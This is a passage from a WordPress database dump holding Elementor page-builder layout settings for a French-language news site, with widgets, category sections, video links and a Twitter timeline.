Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2364,760,'_elementor_version','0.4'),(2365,760,'_elementor_css','a:3:{s:4:\"time\";i:1509370507;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2366,761,'_elementor_edit_mode','builder'),(2367,761,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2368,761,'_elementor_version','0.4'),(2369,762,'_elementor_edit_mode','builder'),(2370,762,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0